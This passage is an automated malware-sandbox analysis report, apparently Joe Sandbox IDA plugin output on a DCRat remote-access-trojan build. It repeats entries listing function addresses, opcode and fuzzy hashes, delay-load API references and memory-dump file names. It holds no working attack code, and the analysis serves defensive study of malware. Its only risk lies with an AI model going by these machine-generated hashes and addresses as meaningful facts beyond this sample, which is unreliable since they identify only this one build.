                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: c77e6a5a8f0e8617523b70dd77aaac687bc8418f1be58a779107008e630b074f
                                      • Instruction ID: 8f72fbffee40437a1d773eaaf3c2686b3941338d598207be0059b2e9febb5013
                                      • Opcode Fuzzy Hash: c77e6a5a8f0e8617523b70dd77aaac687bc8418f1be58a779107008e630b074f
                                      • Instruction Fuzzy Hash: 15B0129226C0017C314CB1056D22F7F026CC4C4B20330851BB109D0146D4488C8B7832
                                      Function 00F1DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 0fc0e2bfe241976fccad70c6dd3e292475760e4267c7b714bbe566ec6d09748e
                                      • Instruction ID: a202b0a1102a340a82ae39104549d07532e93454baababaafc1d4b01d1a79049
                                      • Opcode Fuzzy Hash: 0fc0e2bfe241976fccad70c6dd3e292475760e4267c7b714bbe566ec6d09748e
                                      • Instruction Fuzzy Hash: 1AB012A226C001FC314CB1056C22E7B026CC4C0B20330C11BB409C0186D44C8D8A7932
                                      Function 00F1DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: b6c5430769d8d639d62a95941148bef3c0af82e0d9d332cfdb81b965c0333427
                                      • Instruction ID: 981eb06152f64ed59874289ff48f926afc03af4be01223fde25c1bcb9a5a3d5c
                                      • Opcode Fuzzy Hash: b6c5430769d8d639d62a95941148bef3c0af82e0d9d332cfdb81b965c0333427
                                      • Instruction Fuzzy Hash: 8EB0129736C0077C314C920C2D17EB7023CC0C0B20330801AB20AC0041DA448CC67432
                                      Function 00F1DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 6eecc08001e48a378fe32d45de8a1a18205944b55c92f8dbf9529b08a29611fb
                                      • Instruction ID: 93e60b8009a972ba7c526fcc98e009b81cb79cd947a4b5fce1a65c611281016f
                                      • Opcode Fuzzy Hash: 6eecc08001e48a378fe32d45de8a1a18205944b55c92f8dbf9529b08a29611fb
                                      • Instruction Fuzzy Hash: F3B0129736C007BC314C920C2C17EB7023CC0C0B20330811AB50AC1081DA448CC97432
                                      Function 00F1DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 24ce6ec90a2baac08d2d1121cbfa7658d0c0c64237eb953e6e6065e43defdc71
                                      • Instruction ID: 5f57ba57f14c997a707cfdc064ec0b5d9be3c382bfba6560f32b033a28315513
                                      • Opcode Fuzzy Hash: 24ce6ec90a2baac08d2d1121cbfa7658d0c0c64237eb953e6e6065e43defdc71
                                      • Instruction Fuzzy Hash: 68B0129736C0067C3148921C2C17FB6023CD0C0B20330402AB10BC0042DA408CC97432
                                      Function 00F1DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: e8510995caded15f5f189947eef7f816bdf6f266a30c648e0f7d655f2cf6fdd3
                                      • Instruction ID: f71e535a37402d2ca7a758f7842af2ffab9e67f839050388b547833ec244ee85
                                      • Opcode Fuzzy Hash: e8510995caded15f5f189947eef7f816bdf6f266a30c648e0f7d655f2cf6fdd3
                                      • Instruction Fuzzy Hash: 63B0129737C10B7C324852082C17DB7023CC0C0B60330412AB106D0041DA448CC97432
                                      Function 00F1DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: a2c882c42e5f8904a7d688e9d780ebde50857e47a6b6c2305908250aeba7bc16
                                      • Instruction ID: 588280488e143a10ca09d2f1b440d7615221fea21fe213bb91e7581d78768357
                                      • Opcode Fuzzy Hash: a2c882c42e5f8904a7d688e9d780ebde50857e47a6b6c2305908250aeba7bc16
                                      • Instruction Fuzzy Hash: 42B012922AC1057C714CB1056C22F7B026CE4C0B20330411BB009C0146D4488C867932
                                      Function 00F1DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DC36
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 595e066b9a9771d573729964299fce6eaf05d4a16cdca69998a3d8d9970b0878
                                      • Instruction ID: 1db48a2de6d20ba8ff56542a5cc2a299b1cd7c925f9bfa01b5d719e0118a82a1
                                      • Opcode Fuzzy Hash: 595e066b9a9771d573729964299fce6eaf05d4a16cdca69998a3d8d9970b0878
                                      • Instruction Fuzzy Hash: 2BB0129726C1016CB14C61086C12FB6123CC1C6B20330891EB609D0182D5809CC57832
                                      Function 00F1DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DC36
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 75e3df036b18c4f44fcd9967cbabdf2ff5cbb3d558e5e3d171e9aa1ee4b0821d
                                      • Instruction ID: 09c29b0ee8148410b8857bb280db0548062e209210fe4dc98d4571343c54999b
                                      • Opcode Fuzzy Hash: 75e3df036b18c4f44fcd9967cbabdf2ff5cbb3d558e5e3d171e9aa1ee4b0821d
                                      • Instruction Fuzzy Hash: F8B0129727C2016CB14C61086C12FB6123CC1C1B20330491FB209D0142D5809CC57832
                                      Function 00F1DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DC36
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: df449b04870e0c358c840eda80ca3e92ec76d41ef396df19436e9387bb942a6b
                                      • Instruction ID: afd9ff9a1133943a3f0d5b28ee4f65f50583dbfd4b4ac6c973088f1fb80b7dbe
                                      • Opcode Fuzzy Hash: df449b04870e0c358c840eda80ca3e92ec76d41ef396df19436e9387bb942a6b
                                      • Instruction Fuzzy Hash: 28B0129726C2057DB14C21046E12EB6123CC2C1B203304A1EB205E004295809CC57832
                                      Function 00F1DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8f1fa1407cd1b550a0bf9492d0466d83d576191370f9fea4edad1479be86e831
                                      • Instruction ID: 2d5595055315a9112443d0d17866b2d7532cbf478a86427b9b708a7f57fbfaf0
                                      • Opcode Fuzzy Hash: 8f1fa1407cd1b550a0bf9492d0466d83d576191370f9fea4edad1479be86e831
                                      • Instruction Fuzzy Hash: 7FA0029616D1067C710C71516D26D7B126CC4C5B61730451AB50694145955859867831
                                      Function 00F1DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 151759f3c29cb0eb73ede152fe48ac53fdb61b8b1ee619f9d35a4a1f7d19c8ed
                                      • Instruction ID: 2d5595055315a9112443d0d17866b2d7532cbf478a86427b9b708a7f57fbfaf0
                                      • Opcode Fuzzy Hash: 151759f3c29cb0eb73ede152fe48ac53fdb61b8b1ee619f9d35a4a1f7d19c8ed
                                      • Instruction Fuzzy Hash: 7FA0029616D1067C710C71516D26D7B126CC4C5B61730451AB50694145955859867831
                                      Function 00F1DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 65e4c06b19e4bdd90aac913e6d20ad31404acf0bd6ca07916ef9b72e1364e196
                                      • Instruction ID: 2d5595055315a9112443d0d17866b2d7532cbf478a86427b9b708a7f57fbfaf0
                                      • Opcode Fuzzy Hash: 65e4c06b19e4bdd90aac913e6d20ad31404acf0bd6ca07916ef9b72e1364e196
                                      • Instruction Fuzzy Hash: 7FA0029616D1067C710C71516D26D7B126CC4C5B61730451AB50694145955859867831
                                      Function 00F1DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: c8e8f4d83e4134dfa3b88c5461a72824fe7ea584faf676508632abed3e61eb77
                                      • Instruction ID: 2d5595055315a9112443d0d17866b2d7532cbf478a86427b9b708a7f57fbfaf0
                                      • Opcode Fuzzy Hash: c8e8f4d83e4134dfa3b88c5461a72824fe7ea584faf676508632abed3e61eb77
                                      • Instruction Fuzzy Hash: 7FA0029616D1067C710C71516D26D7B126CC4C5B61730451AB50694145955859867831
                                      Function 00F1DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 5d5649beac332af328b6db5c1026e6a1274d72e4ef9b872df303f2b17a2db207
                                      • Instruction ID: 2d5595055315a9112443d0d17866b2d7532cbf478a86427b9b708a7f57fbfaf0
                                      • Opcode Fuzzy Hash: 5d5649beac332af328b6db5c1026e6a1274d72e4ef9b872df303f2b17a2db207
                                      • Instruction Fuzzy Hash: 7FA0029616D1067C710C71516D26D7B126CC4C5B61730451AB50694145955859867831
                                      Function 00F1DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
